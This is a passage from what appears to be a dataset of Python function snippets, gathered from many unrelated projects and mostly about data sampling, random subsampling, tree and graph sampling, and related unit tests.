agent=agent,\n affinity=affinity,\n seed=0\n )\n _, traj_info = sampler.obtain_samples(0)\n print(np.mean([t['DiscountedReturn'] for t in traj_info]))", "def balanced_sampling(dat: pd.DataFrame, logger=None):\n if logger == None:\n logging.basicConfig(\n level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n \n \n # upsampling\n logger.info('Start balanced sampling')\n subsample = []\n num_of_each_class = dat.iloc[:, -1].value_counts().to_numpy()\n if num_of_each_class.std()*1.0 / num_of_each_class.mean() < 0.1:\n logger.info('The given data is balance.')\n # the dataset is balanced\n return dat\n logger.info('Given dataset is unbalance')\n logger.info('Sampling data from each class to generate a new dataset')\n n_smp = num_of_each_class.max()\n for label in dat.iloc[:, -1].value_counts().index:\n samples = dat[dat.iloc[:, -1] == label]\n num_samples = len(samples)\n index_range = range(num_samples)\n # take all from the set\n indexes = list(np.random.choice(index_range, size=num_samples, replace=False))\n indexes2 = list(np.random.choice(\n index_range, 
size=n_smp-num_samples, replace=True)) # add random items\n indexes.extend(indexes2)\n subsample.append(samples.iloc[indexes, :])\n logger.info('End with sampling')\n out = pd.concat(subsample)\n out = out.sample(frac=1).reset_index(drop=True) # shuffle and re index\n return out", "def sample(self, rng, query_value=None):\n nodes = jnp.array(self.nodes)\n query_value = (\n jax.random.uniform(rng) if query_value is None else query_value)\n query_value *= self._total_priority()\n\n _, index, _ = jax.lax.fori_loop(0, self.depth, step,\n (query_value, 0, nodes))\n\n return np.minimum(index - self.low_idx, self.highest_set)", "def sample(self, root, tree, sample_num, for_d):\n\n # all_score = self.sess.run(self.generator.all_score)\n # all_score is a matrix with shape [n_node, n_node]\n all_score = self.generator.all_score\n samples = []\n paths = []\n n = 0\n\n while len(samples) < sample_num:\n current_node = root\n previous_node = -1\n paths.append([])\n is_root = True\n paths[n].append(current_node)\n while True:\n node_neighbor = tree[current_node][1:] if is_root else tree[current_node]\n # print(\"////\", tree[current_node])\n is_root = False\n if len(node_neighbor) == 0: # the tree only has a root\n return None, None\n if for_d: # skip 1-hop nodes (positive samples)\n if node_neighbor == [root]:\n # in current version, None is returned for simplicity\n return None, None\n if root in node_neighbor:\n node_neighbor.remove(root)\n\n # we retrieve embeddings corresponding to current node's neighbors\n # the multiply of g_v with shape (1, 50) and g_vi with shape(1, 50) is a scala\n # to calculate the multiply of g_v and g_vi: we calculate the \"multiplication\" (inner product) between embedding_matrix with shape(n_node, 50) and its transpose\n # then saved the result in self.score with shape (n_node, n_node) in dis_torch.py\n # all_score has the shape = (5254, 5254), each row is a list of scala, each scala is the \"multiplication\" (inner product) between a particular node to an other node in the graph\n # due to for each current_node, we have a list of its neighbors, saved in [node_neighbor]\n # we can retrieve a list of scalas that equal to the \"multiplications\" (inner product) between g_v(current node) to its neighbor g_vi\n # to do that, we have:\n relevance_probability = all_score[current_node][node_neighbor]\n\n # convert tensor to numpy array\n relevance_probability = relevance_probability.cpu().detach().numpy()\n\n # finally, applying softmax function, we get the relevance probability of current_node and its neighbors, as formed in the paper\n relevance_probability = utils.softmax(relevance_probability)\n \n # pick a random node from its neighbors based on relevance_probability\n next_node = np.random.choice(node_neighbor, size=1, p=relevance_probability)[0] # select next node\n # print(\"???\", next_node)\n paths[n].append(next_node)\n if next_node == previous_node: # terminating condition\n samples.append(current_node)\n break\n previous_node = current_node\n current_node = next_node\n n = n + 1 # n equal to sample_num\n return samples, paths # for each sample, we get one path from root to that sample", "def test_simpSample(self):\n\n #uniform dist\n ulim = [0,1]\n ufun = lambda x: 1.0/np.diff(ulim)\n\n n = int(1e5)\n usample = statsFun.simpSample(ufun,n,ulim[0],ulim[1])\n self.assertGreaterEqual(usample.min(), ulim[0])\n self.assertLessEqual(usample.max(), ulim[1])\n\n nlim = [-10,10]\n nfun = lambda x: np.exp(-x**2./2.0)/np.sqrt(2.0*np.pi)\n nsample = 
statsFun.simpSample(nfun,n,nlim[0],nlim[1])\n self.assertGreaterEqual(nsample.min(), nlim[0])\n self.assertLessEqual(nsample.min(), nlim[1])\n\n self.assertGreaterEqual(scipy.stats.kstest(usample,'uniform')[1],0.01,'Uniform sample does not look uniform.')\n self.assertGreaterEqual(scipy.stats.kstest(nsample,'norm')[1],0.01,'Normal sample does not look normal.')\n self.assertLessEqual(scipy.stats.kstest(nsample,'uniform')[1],0.01,'Normal sample looks too uniform.')\n self.assertLessEqual(scipy.stats.kstest(usample,'norm')[1],0.01,'Uniform sample looks too normal.')", "def get_subsample_of_nodes(g, sampl=1):\n return sample(g.nodes(), int(len(g.nodes())*sampl))", "def adapted_rand(seg, gt, all_stats=False):\n # just to prevent division by 0\n epsilon = 1e-6\n\n # segA is truth, segB is query\n segA = np.ravel(gt)\n segB = np.ravel(seg)\n n = segA.size\n\n n_labels_A = np.amax(segA) + 1\n n_labels_B = np.amax(segB) + 1\n\n ones_data = np.ones(n)\n\n p_ij = sparse.csr_matrix((ones_data, (segA[:], segB[:])), shape=(n_labels_A, n_labels_B))\n\n a = p_ij[1:n_labels_A, :]\n b = p_ij[1:n_labels_A, 1:n_labels_B]\n c = p_ij[1:n_labels_A, 0].todense()\n d = b.multiply(b)\n\n a_i = np.array(a.sum(1))\n b_i = np.array(b.sum(0))\n\n sumA = np.sum(a_i * a_i)\n sumB = np.sum(b_i * b_i) + (np.sum(c) / n)\n sumAB = np.sum(d) + (np.sum(c) / n)\n\n precision = sumAB / max(sumB, epsilon)\n recall = sumAB / max(sumA, epsilon)\n\n fScore = 2.0 * precision * recall / max(precision + recall, epsilon)\n are = 1.0 - fScore\n\n if all_stats:\n return are, precision, recall\n else:\n return are", "def post(self, s):\n return np.random.choice(self.sample_list)", "def sample(self, s):\n rng = np.random.default_rng()\n return rng.choice(np.arange(self.n_actions), p=self.eval(s))", "def sampling(data,classes,others=None,portion=0.9,max_size_given=None,rng=np.random.RandomState(100)): \n u, indices = np.unique(classes,return_inverse=True)\n indices=np.asarray(indices)\n num_u=len(u)\n sample_sizes=[]\n \n # get sample size of each class\n for i in range(num_u):\n sample_size_this=np.sum(indices==i)\n sample_sizes.append(sample_size_this)\n sample_sizes=np.array(sample_sizes,dtype=int)\n sample_sizes=sample_sizes*portion\n sample_sizes=np.array(sample_sizes,dtype=int)\n # set a ceiling/limit\n if max_size_given is not None:\n sample_sizes[sample_sizes>max_size_given]=max_size_given \n\n indices_all=np.array([],dtype=indices.dtype)\n indices_range=np.array(range(len(indices)))\n\n # sampling\n for i in range(num_u):\n ind_this_num=indices_range[indices==i]\n ind_this_reduced=ind_this_num[rng.choice(len(ind_this_num),size=sample_sizes[i],replace=False)]\n indices_all=np.append(indices_all,ind_this_reduced)\n \n # reduce the data \n data=data[indices_all,:]\n classes=classes[indices_all]\n if np.any(others):\n others=others[indices_all]\n return data,classes,indices_all,others", "def generate_samples(self, n_samples):", "def generate_samples(self, n_samples):", "def stirling(k, r) :\n\n return sum((-1)**(r-i)*binomial(r, i)*i**k for i in range(r+1)) / math.factorial(r)", "def recursion_tree(self,node):\n if node.clades: # for non-leaf node\n tmp = 0\n flag = 0\n for clade in node.clades:\n if flag == 0:\n tmp = copy.copy(self.recursion_tree(clade).sample_series)\n else:\n tmp += self.recursion_tree(clade).sample_series \n flag = 1\n node.sample_series = tmp\n else: # leaf node which has been init above.\n try:\n a = node.sample_series\n #print(node.name +' is a leaf')\n except:\n print('please initialize the tree leaves by otu 
table.')\n return node", "def simple_sampler(fun, start, sigma, iterations, verbose=False):\n mean = np.zeros(len(start))\n cov = np.eye(len(start)) * sigma\n\n if isinstance(start, np.ndarray):\n previous = start\n else:\n previous = np.array(start)\n\n f_previous = fun(previous)\n\n samples = np.zeros((iterations, len(start)))\n acceptance = 0\n for i in range(iterations):\n proposal = previous + np.random.multivariate_normal(mean=mean, cov=cov)\n f_proposal = fun(proposal)\n fun(previous)\n if (np.log(np.random.rand())) < (f_proposal - f_previous):\n previous = proposal\n acceptance += 1\n samples[i] = np.array(previous)\n\n if verbose:\n print('sampler acceptance = {0:.3f}'.format(acceptance / iterations))\n\n return samples", "def search_tree_sample(variables, formula, samples):\n\n to_use = list(variables)\n used_vars = []\n solns = [None]\n\n while to_use != []:\n next_var = to_use[0]\n to_use = to_use[1:]\n\n solns = black_box_sample(formula, solns, samples, used_vars, next_var)\n used_vars.append(next_var)\n\n return uniform_select(solns)", "def easy_sample(self, num, **kwargs):\n return self.preprocess(self.sample(num, **kwargs), **kwargs)", "def sample_tree(self):\n logger.info('TreeCatTrainer.sample_tree given %d rows',\n len(self._added_rows))\n SERIES.sample_tree_num_rows.append(len(self._added_rows))\n complete_grid = self._tree.complete_grid\n edge_logits = self.compute_edge_logits()\n assert edge_logits.shape[0] == complete_grid.shape[1]\n assert edge_logits.dtype == np.float32\n edges = self.get_edges()\n edges = sample_tree(complete_grid, edge_logits, edges)\n return edges, edge_logits", "def populate_synthetic_tree(self):\r\n logging.debug('populating synthetic tree...')\r\n a_data = self.realData\r\n ndata = a_data.shape[1]\r\n for i in range(ndata):\r\n ptx = a_data[0, i]\r\n pty = a_data[1, i]\r\n leaf = self.root.find_subnode(ptx, pty)\r\n leaf.n_count += 1\r\n\r\n # traverse the tree and update leaf counts\r\n stack = deque()\r\n stack.append(self.root)\r\n while len(stack) > 0:\r\n cur_node = stack.popleft()\r\n if cur_node.n_isLeaf is True: # leaf\r\n cur_node.n_count += self.differ.getNoise(1, 0.5 * self.param.Eps)\r\n else:\r\n stack.append(cur_node.nw)\r\n stack.append(cur_node.ne)\r\n stack.append(cur_node.sw)\r\n stack.append(cur_node.se)", "def regular_subsample(neuron):\n # select all the main points\n selected_index = get_main_points(neuorn)\n\n # Computing the parent id of the selected nodes\n neuron = neuron_with_selected_nodes(selected_index)\n return neuron", "def test_decision_tree_min_samples_split_parameter(params, X_train, X_test, y_train, y_test):", "def samples(self, gp):\r\n orig_shape = gp.shape\r\n gp = gp.flatten()\r\n #FIXME: Very slow as we are computing a new random variable per input!\r\n #Can't get it to sample all at the same time\r\n #student_t_samples = np.array([stats.t.rvs(self.v, self.gp_link.transf(gpj),scale=np.sqrt(self.sigma2), size=1) for gpj in gp])\r\n dfs = np.ones_like(gp)*self.v\r\n scales = np.ones_like(gp)*np.sqrt(self.sigma2)\r\n student_t_samples = stats.t.rvs(dfs, loc=self.gp_link.transf(gp),\r\n scale=scales)\r\n return student_t_samples.reshape(orig_shape)", "def __init__(self, size = 1000, discard_sample = False, method = 'first'):\r\n super(SampleNode, self).__init__()\r\n self.size = size\r\n self.discard_sample = discard_sample\r\n self.method = method\r\n # random nodes need a stack to hold intermediate records\r\n if method == \"random\":\r\n self.stack = Stack(size)\r\n else:\r\n self.stack = None\r\n if 
method == \"percent\" and ((size>100) or (size<0)):\r\n raise ValueError, \"Sample size must be between 0 and 100 with 'percent' method.\"", "def reproduce(self):\n\n def compute_seeds(fitness):\n \"\"\" Computes the number of seeds given a fitness value. \"\"\"\n\n seeds = (fitness-min_fitness) / (max_fitness-min_fitness) * \\\n (self.max_seeds-self.min_seeds) + self.min_seeds\n\n return round(seeds)\n\n # evaluates max and min fitness for current year\n max_fitness = max(tree[0] for tree in self.population)\n min_fitness = min(tree[0] for tree in self.population)\n\n # computes the number of seeds produced per tree\n for tree in self.population:\n tree[1].seeds = int(compute_seeds(tree[0]))", "def _generate(self, **kwargs):\n N = self.parameter_schema['N']\n parameter_count = len(self._parameter_names)\n common_override_kwargs = {}\n override_kwargs = self._sampler_overrides(common_override_kwargs)\n if kwargs:\n kwargs.update(override_kwargs)\n else:\n kwargs = override_kwargs\n __import__(\"SALib.sample\", fromlist=[self.sampler_class])\n sampler = getattr(SALib.sample, self.sampler_class)\n problem = self.parameter_schema[\"problem\"]\n self._samples = sampler.sample(problem, N, **kwargs)\n self._samples = numpy.unique(self._samples, axis=0)\n super()._generate()", "def create_weighted_sampler(local_df, test_label = 'protease_stability'):\n all_label_ids = torch.tensor([x for x in local_df[test_label]], dtype=torch.long)\n labels_unique, counts = np.unique(local_df[test_label], return_counts=True)\n print(labels_unique)\n\n class_weights = [sum(counts)/c for c in counts]\n print(class_weights)\n\n weights = [class_weights[e] for e in local_df[test_label]]\n\n print(len(local_df[test_label]))\n sampler = data_utils.WeightedRandomSampler(weights, len(local_df[test_label]))\n return sampler", "def sample(\n self, n=None, weight_by_clusters=False, random_state=None, **kwargs\n ):\n\n if not isinstance(n, int):\n n = 1\n\n if isinstance(random_state, int):\n np.random.seed(random_state)\n\n # Sort by base 4 id\n if weight_by_clusters:\n df = self.weight_grids(**kwargs)\n else:\n df = self.to_frame()\n\n df = df.sort_values(by='id')\n\n npool = df.shape[0]\n interval = int(np.ceil(npool / n))\n\n # Get a random starting index\n start = np.random.randint(0, high=interval, size=1, dtype=int)[0]\n\n # Get the sample indices\n sample_indices = np.arange(start, npool, interval)\n\n # Get the random grids\n df_sample = df.iloc[sample_indices]\n\n sample_indices = []\n\n # Iterate over the selected grids,\n # get intersecting samples, and\n # select 1 sample within each grid.\n for row in df_sample.itertuples():\n\n # The grid bounds\n bbox = row.geometry.bounds\n\n # Points that intersect the current grid\n point_int = list(self.sindex.intersection(bbox))\n\n # Get one random point within the grid\n sample_indices.append(\n np.random.choice(point_int, size=1, replace=False)[0]\n )\n\n # Get the random points\n return self.dataframe.iloc[sample_indices]", "def __call__(self, params):\r\n return self.sample(params)", "def simple_stratify(df, statify_column, seed=0, ratios=None, verbose=False):\n if ratios == \"original\":\n return df\n else:\n np.random.seed(seed)\n vc = df[statify_column].value_counts()\n masks = [(df[statify_column] == v) for v in vc.index]\n sizes = list(vc)\n if not isinstance(ratios, (list, tuple)):\n if ratios:\n leftover = 1.0 - ratios\n ratios = [leftover / (vc.shape[0] - 1)] * (vc.shape[0] - 1) + [ratios]\n else:\n ratios = [1.0 / vc.shape[0]] * vc.shape[0]\n if 
len(ratios) == vc.shape[0]:\n tentative_sizes = np.array([n / alpha for n, alpha in zip(sizes, ratios)])\n else:\n print(\n \"ratios len does is not equal to the number of classes : \"\n \"len ratios {0}, value counts {1}\".format(len(ratios), vc.shape[0])\n )\n if verbose:\n print(\"ratios in the training : {0}\".format(ratios))\n optimal_index = np.argmin(tentative_sizes)\n size0 = tentative_sizes[optimal_index]\n new_sizes = [int(x * size0) for x in ratios]\n # size = np.sum(new_sizes)\n indices = [\n np.random.choice(actual, new_size, replace=False)\n for actual, new_size in zip(sizes, new_sizes)\n ]\n subdfs = [df.loc[m].iloc[ii] for m, ii in zip(masks, indices)]\n dfr = pd.concat(subdfs)\n return dfr", "def sample(self, n_samps):\n # print('gauss trying to sample '+str(n_samps)+' from '+str(self.dist))\n # xs = np.array([self.sample_one() for n in range(n_samps)])\n xs = np.array(self.dist.sample(n_samps))\n # print('gauss sampled '+str(n_samps)+' from '+str(self.dist))\n return xs", "def sample(self, batch_size):\n\n if self.tree.filled_size() < batch_size:\n return None, None, None\n\n out = []\n indices = []\n weights = []\n priorities = []\n i = 0\n while i < batch_size:\n r = random.random()\n data, priority, index = self.tree.find(r)\n if not data:\n continue\n priorities.append(priority)\n weights.append((1. / self.capacity / priority) ** self.beta if priority > 1e-16 else 0)\n indices.append(index)\n out.append(data)\n self.priority_update([index], [0]) # To avoid duplicating\n i += 1\n\n self.priority_update(indices, priorities) # Revert priorities\n\n weights = [w / max(weights) for w in weights] # Normalize for stability\n\n return out, weights, indices", "def _call(self, dataset):\n # first cast to floating point dtype, because noise is most likely\n # floating point as well and '+=' on int would not do the right thing\n # XXX should we already deepcopy here to keep orig dtype?\n if not N.issubdtype(dataset.samples.dtype, N.float):\n dataset.setSamplesDType('float32')\n\n if __debug__:\n nfeatures = dataset.nfeatures\n\n sens_map = []\n\n # compute the datameasure on the original dataset\n # this is used as a baseline\n orig_measure = self.__datameasure(dataset)\n\n # do for every _single_ feature in the dataset\n for feature in xrange(dataset.nfeatures):\n if __debug__:\n debug('PSA', \"Analyzing %i features: %i [%i%%]\" \\\n % (nfeatures,\n feature+1,\n float(feature+1)/nfeatures*100,), cr=True)\n\n # make a copy of the dataset to preserve data integrity\n wdata = deepcopy(dataset)\n\n # add noise to current feature\n wdata.samples[:, feature] += self.__noise(size=wdata.nsamples)\n\n # compute the datameasure on the perturbed dataset\n perturbed_measure = self.__datameasure(wdata)\n\n # difference from original datameasure is sensitivity\n sens_map.append(perturbed_measure - orig_measure)\n\n if __debug__:\n debug('PSA', '')\n\n return N.array(sens_map)", "def test_returns_densest(self, graph, monkeypatch):\n adj = (\n (0, 1, 0, 1, 1, 0),\n (1, 0, 1, 1, 1, 0),\n (0, 1, 0, 1, 0, 0),\n (1, 1, 1, 0, 1, 0),\n (1, 1, 0, 1, 0, 0),\n (0, 0, 0, 0, 0, 0),\n )\n graph = nx.Graph(\n 0.5 * np.array(adj)\n ) # multiply by 0.5 to follow weightings of adj fixture\n optimal_density = 1.0\n optimal_sample = [0, 1, 9, 16]\n graph = nx.relabel_nodes(graph, lambda x: x ** 2)\n\n with monkeypatch.context() as m:\n m.setattr(sample, \"sample_subgraphs\", self.sampler)\n # The monkeypatch above is not necessary given the one below, but simply serves to\n # speed up testing by not requiring a 
call to ``sample_subgraphs``, which is a\n # bottleneck\n\n m.setattr(resize, \"resize_subgraphs\", self.sampler)\n\n result = dense.random_search(graph=graph, nodes=4, iterations=10)\n\n assert result == (optimal_density, optimal_sample)", "def spheroid_sample():\n DIMENSIONS = 10\n N_SAMPLES = 50*DIMENSIONS\n problem = problems.SpheroidProblem()\n\n representation = Representation(\n initialize=initializers.create_real_vector(bounds=[(-5.12, 5.12)]*DIMENSIONS)\n )\n\n initial_sample = representation.create_population(N_SAMPLES, problem)\n Individual.evaluate_population(initial_sample)\n\n return problem, representation, initial_sample", "def score_samples(self, X):\n ...", "def test_score_with_sample_weights():\n atom = ATOMClassifier(X_bin, y_bin, random_state=1)\n atom.run(\"Tree\")\n score = atom.tree.score(X_bin, y_bin, sample_weight=list(range(len(y_bin))))\n assert isinstance(score, np.float64)", "def test_simpSample_trivial(self):\n\n ulim = [0,1]\n ufun = lambda x: 1.0/np.diff(ulim)\n\n n = 10000\n sample = statsFun.simpSample(ufun,n,0.5,0.5)\n\n self.assertEqual(len(sample),n)\n self.assertTrue(np.all(sample == 0.5))", "def _sample_synthetic(self, X):\n n_samples = X.shape[0]\n self.y = np.concatenate((np.ones(n_samples), np.zeros(n_samples)))\n \n random_state = _forest.check_random_state(self.random_state) \n\n X_synth = np.asarray([np.apply_along_axis(random_state.choice, 0, X) for _ in range(n_samples)])\n self.X = np.concatenate((X, X_synth))\n\n return self.X, self.y", "def sample(self):\n x = self.state\n# dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sampler(self, *args, **kwargs):\n\n return (samples_subgraphs ** 2).tolist()", "def test_weighted_consensus_from_scored_trees_collection(self):\n sct = LogLikelihoodScoredTreeCollection(self.scored_trees)\n ct = sct.getConsensusTree()\n self.assertTrue(ct.sameTopology(Tree(\"((a,b),(c,d));\")))", "def sample(self, x):", "def sample_path_len(self,num_samp=0x200):\n sum_finger_path = 0.0\n\n # We don't want to sample more than the total amount of nodes:\n num_samp = min([num_samp,self.num_nodes])\n\n snodes = random.sample(self.nodes,num_samp)\n for sn in snodes:\n for f in SUCC_FINGERS:\n sum_finger_path += sn.get_best_succ_finger(f).path_len\n for f in PRED_FINGERS:\n sum_finger_path += sn.get_best_pred_finger(f).path_len\n\n num_fingers = len(SUCC_FINGERS) + len(PRED_FINGERS)\n return sum_finger_path/(num_samp * num_fingers)", "def _choose_sample(self):\n\n \t #periodically generate a new reconstruction for the purposes of sampling", "def random_subsample(neuron, num):\n\n I = np.arange(neuron.n_soma, neuron.n_node)\n np.random.shuffle(I)\n selected_index = I[0:num - 1]\n selected_index = np.union1d([0], selected_index)\n selected_index = selected_index.astype(int)\n selected_index = np.unique(np.sort(selected_index))\n\n return neuron_with_selected_nodes(neuron, selected_index)", "def balanced_subsample(y, s):\n sample = []\n # For every label in the dataset\n for label in np.unique(y):\n # Get the index of all images with a specific label\n images = np.where(y==label)[0]\n # Draw a random sample from the images\n random_sample = np.random.choice(images, size=s, replace=False)\n # Add the random sample to our subsample list\n sample += random_sample.tolist()\n return sample", "def sorted_stratified_train_test_split(collated_df, 
test_size=0.2):\n\n collated_df = collated_df[collated_df['GOOD'] == 1]\n collated_df['MUL'] = collated_df['HEART_RATE_BPM'] * collated_df['RESP_RATE_BR_PM']\n collated_df = collated_df.sort_values(['MUL'], ascending=[False])\n rows = collated_df.values.tolist() \n n_test = int(round(len(collated_df)*test_size))\n\n #delegates = []\n #subject_set = set()\n\n #for row in rows:\n # subject = row[0]\n # if subject not in subject_set:\n # delegates.append(subject)\n # subject_set |= set([subject])\n \n #n_test = int(round(len(subject_set)*test_size))\n #tiers = tiers_by_magnitude(delegates, n_tier=n_test) \n\n tiers = tiers_by_magnitude(rows, n_tier=n_test)\n X_test = []\n while n_test != 0:\n for T in tiers:\n samp = T.pop(random.randint(0, len(T) - 1))\n X_test.append(samp[:2])\n n_test -= 1\n\n return X_test", "def sample(self, n):\n raise NotImplementedError", "def initial_sampling(self, params):\n i = params\n theta_star = self.priors_sample()\n model = self.simz( theta_star )\n rho = test_dist(self.data, model)\n while rho > self.eps0: \n theta_star = self.priors_sample()\n model = self.simz( theta_star )\n rho = test_dist(self.data, model)\n data_list = [np.int(i)]\n\n for i_param in xrange(self.n_params): \n data_list.append(theta_star[i_param])\n data_list.append(1./np.float(self.N))\n data_list.append(rho)\n\treturn np.array(data_list)", "def get_collapsed_stochastic_test_sample(self, x, reuse=False):\n\t\tprint('TEST: implicitly flipping individual bits with probability {}'.format(self.test_noise))\n\t\tdset_name = self.datasource.target_dataset\n\t\tif dset_name in ['mnist', 'BinaryMNIST', 'omniglot', 'random']:\n\t\t\tmean = self.encoder(x, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'cifar10':\n\t\t\tmean = self.cifar10_convolutional_encoder(x, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'svhn':\n\t\t\tmean = self.convolutional_32_encoder(x, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'celebA':\n\t\t\tmean = self.complex_encoder(x, reuse=tf.AUTO_REUSE)\n\t\telse:\n\t\t\tprint('dataset {} is not supported!'.format(dset_name))\n\t\t\traise NotImplementedError\n\n\t\t# for downstream classification\n\t\tclassif_q = Bernoulli(logits=mean)\n\t\tclassif_y = tf.cast(classif_q.sample(), tf.float32)\n\n\t\t# test BSC\n\t\tif self.noise != 0:\n\t\t\ty_hat_prob = tf.nn.sigmoid(mean)\n\t\t\ttotal_prob = y_hat_prob - (2 * y_hat_prob * self.test_noise) + self.test_noise\n\t\t\tq = Bernoulli(probs=total_prob)\n\t\telse:\n\t\t\tprint('no additional channel noise; feeding in logits for latent q_phi(z|x) to avoid numerical issues')\n\t\t\ttotal_prob = tf.nn.sigmoid(mean)\n\t\t\tq = Bernoulli(logits=mean)\n\n\t\ty = tf.cast(q.sample(), tf.float32)\n\t\tif dset_name in ['mnist', 'BinaryMNIST', 'omniglot', 'random']:\n\t\t\tx_reconstr_logits = self.decoder(y, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'cifar10':\n\t\t\tx_reconstr_logits = self.cifar10_convolutional_decoder(y, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'svhn':\n\t\t\tx_reconstr_logits = self.convolutional_32_decoder(y, reuse=tf.AUTO_REUSE)\n\t\telif dset_name == 'celebA':\n\t\t\tx_reconstr_logits = self.complex_decoder(y, reuse=tf.AUTO_REUSE)\n\t\telse:\n\t\t\tprint('dataset {} is not supported!'.format(dset_name))\n\t\t\traise NotImplementedError\n\n\t\treturn total_prob, y, classif_y, q, x_reconstr_logits", "def sampling(args):\n t_mean, t_log_var = args\n # YOUR CODE HERE\n epsilon = K.random_normal(t_mean.shape)\n z = epsilon * K.exp(0.5 * t_log_var) + t_mean\n return z", "def test_000_basic_functionality() -> None:\n df = 
generate_test_data()\n skim(df)", "def create_samples(self, skills_sample_fraction=1.0, users_sample_fraction=1.0):\n # Sampling\n self.sample_skills_to_be_covered(skills_sample_fraction)\n self.sample_users(users_sample_fraction)", "def apply():\r\n result = dataSampling(str, \"hhhhhhahhhhhahhahahahahhahahha\", 5)\r\n final_res = dataScreening(result, \"ha\")\r\n print(final_res)", "def uniformSample (self) :\n S = self.mdp.S\n A = self.mdp.A\n\n for s, a in product(range(S), range(A)):\n s_, self.R[s, a] = self.mdp.step(s, a)\n self.updateVisitStatistics(s, a, s_)", "def _partial_fit(self, X, y, weight):\n\n self.samples_seen += weight\n self.sum_of_values += weight * y\n self.sum_of_squares += weight * y * y\n\n try:\n self.sum_of_attribute_values += weight * X\n self.sum_of_attribute_squares += weight * X * X\n except ValueError:\n\n self.sum_of_attribute_values = weight * X\n self.sum_of_attribute_squares = weight * X * X\n\n if self._tree_root is None:\n self._tree_root = self._new_learning_node()\n self._active_leaf_node_cnt = 1\n self._tree_root.learn_one(X, y, weight, self, None, -1)", "def sample_cond_on_subtree_nodes(new, tree, subtree_nodes, subtree_edges, subtree_adjlist):\n new_separators = {}\n new_cliques = set()\n old_cliques = set()\n subtree_order = len(subtree_nodes)\n #print(\"subtree nodes:\" + str(subtree_nodes))\n\n if subtree_order == 0:\n # If the tree, tree is empty (n isolated node),\n # add random neighbor.\n c = frozenset([new])\n new_cliques.add(c)\n #c2 = tree.nodes()[0] # nx 1.9\n c2 = list(tree.nodes())[0] # GraphTool\n #c2 = list(tree.nodes)[0] # nx 2.1\n tree.add_node(c, label=tuple([new]), color=\"red\")\n tree.add_edge(c, c2, label=tuple([]))\n\n sep = frozenset()\n #tree.fix_graph()\n trilearn.graph.junction_tree.randomize_at_sep(tree, sep)\n\n new_separators[sep] = [(c, c2)]\n # tree TODO: the actual value for the key is not needed.\n P = {c: np.exp(-tree.log_nu(sep))}\n return (old_cliques, new_cliques, new_separators, P, {c: 1.0})\n\n S = {c: set() for c in subtree_nodes}\n M = {c: set() for c in subtree_nodes}\n for c in S:\n for neig in subtree_adjlist[c]:\n #S[c] = S[c] | (c & neig)\n S[c] |= (c & neig)\n RM = {c: c - S[c] for c in S}\n C = {c: set() for c in subtree_nodes}\n P = {}\n N_S = {c: set() for c in subtree_nodes}\n\n sepCondition = {}\n for c in RM:\n sepCondition[c] = len({neig for neig in subtree_adjlist[c] if\n S[c] == neig & c}) > 0 or len(subtree_adjlist) == 1\n\n if sepCondition[c] is True:\n tmp = np.array(list(RM[c]))\n first_node = []\n if len(tmp) > 0:\n # Connect to one node\n first_ind = np.random.randint(len(tmp))\n first_node = tmp[[first_ind]]\n tmp = np.delete(tmp, first_ind)\n\n rest = set()\n if len(tmp) > 0:\n # Connect to the rest of the nodes if there are any left\n rest = aux.random_subset(tmp)\n M[c] = frozenset(rest | set(first_node))\n else:\n M[c] = frozenset(aux.random_subset(RM[c]))\n\n # Create the new cliques\n for clique in M:\n C[clique] = frozenset(M[clique] | S[clique] | {new})\n new_cliques.add(C[clique])\n\n # Get the neighbor set of each c which can be moved to C[c]\n for clique in subtree_nodes:\n N_S[clique] = {neig for neig in tree.neighbors(clique)\n if neig & clique <= C[clique] and neig not in subtree_nodes}\n\n # Add the new cliques\n #for c in subtree_nodes:\n # tree.add_node(C[c], label=str(tuple(C[c])), color=\"red\")\n tree.add_nodes_from([C[c] for c in subtree_nodes])\n\n # Construct and add the new edges between the new cliques,\n # replicating the subtree\n new_subtree_edges = []\n 
for e in subtree_edges:\n sep = C[e[0]] & C[e[1]]\n if not sep in new_separators:\n new_separators[sep] = []\n new_separators[sep].append((C[e[0]], C[e[1]]))\n #new_subtree_edges.append((C[e[0]], C[e[1]]))\n tree.add_edge(C[e[0]], C[e[1]])\n # tree.add_edges_from(new_subtree_edges)\n\n # Connect cliques in the subtree to the new cliques\n for c in subtree_nodes:\n # Move the neighbors of a swallowed node to the swallowing node\n # Remove the swallowed node\n\n if C[c] - {new} == c:\n # If connecting to all nodes in a clique (the node should be replaces instead)\n for neig in tree.neighbors(c):\n if neig not in subtree_nodes:\n tree.add_edge(C[c], neig)#, label=lab)\n\n tree.remove_node(c)\n old_cliques.add(c)\n else: # If not connecting to every node in a clique\n sep = C[c] & c\n if not sep in new_separators:\n new_separators[sep] = []\n new_separators[sep].append((C[c], c))\n\n #print \"adding edge: \" + str((C[c], c))\n tree.add_edge(C[c], c)\n # Pick random subset of neighbors intersecting with subset of S U M\n\n N = aux.random_subset(N_S[c])\n #for neig in N:\n # tree.add_edge(C[c], neig)\n\n tree.add_edges_from([(C[c], neig) for neig in N])\n tree.remove_edges_from([(c, neig) for neig in N])\n\n # Compute probabilities\n N = {}\n for c in subtree_nodes:\n if sepCondition[c] is False:\n # Every internal node in c belongs to a separator\n P[c] = np.power(2.0, - len(RM[c]))\n #P[c] = Fraction(1, 2 ** len(RM[c]))\n if not len(c) + 1 == len(C[c]):\n N[c] = np.power(2.0, - len(N_S[c]))\n #N[c] = Fraction(1, 2 ** len(N_S[c]))\n else:\n N[c] = 1.0\n #N[c] = Fraction(1,1)\n else:\n P[c] = 1.0\n #P[c] = Fraction(1, 1)\n N[c] = 1.0\n #N[c] = Fraction(1, 1)\n if len(RM[c]) > 1:\n P[c] = 1.0 / len(RM[c])\n #P[c] = Fraction(1, len(RM[c]))\n P[c] *= np.power(2.0, - (len(RM[c]) - 1.0)) * len(M[c])\n #P[c] *= Fraction(len(M[c]), 2 ** (len(RM[c]) - 1.0)) \n if not len(c) + 1 == len(C[c]): # c not swallowed by C[c]\n #N[c] = np.power(2.0, - len(N_S[c]))\n N[c] = Fraction(1, 2 ** 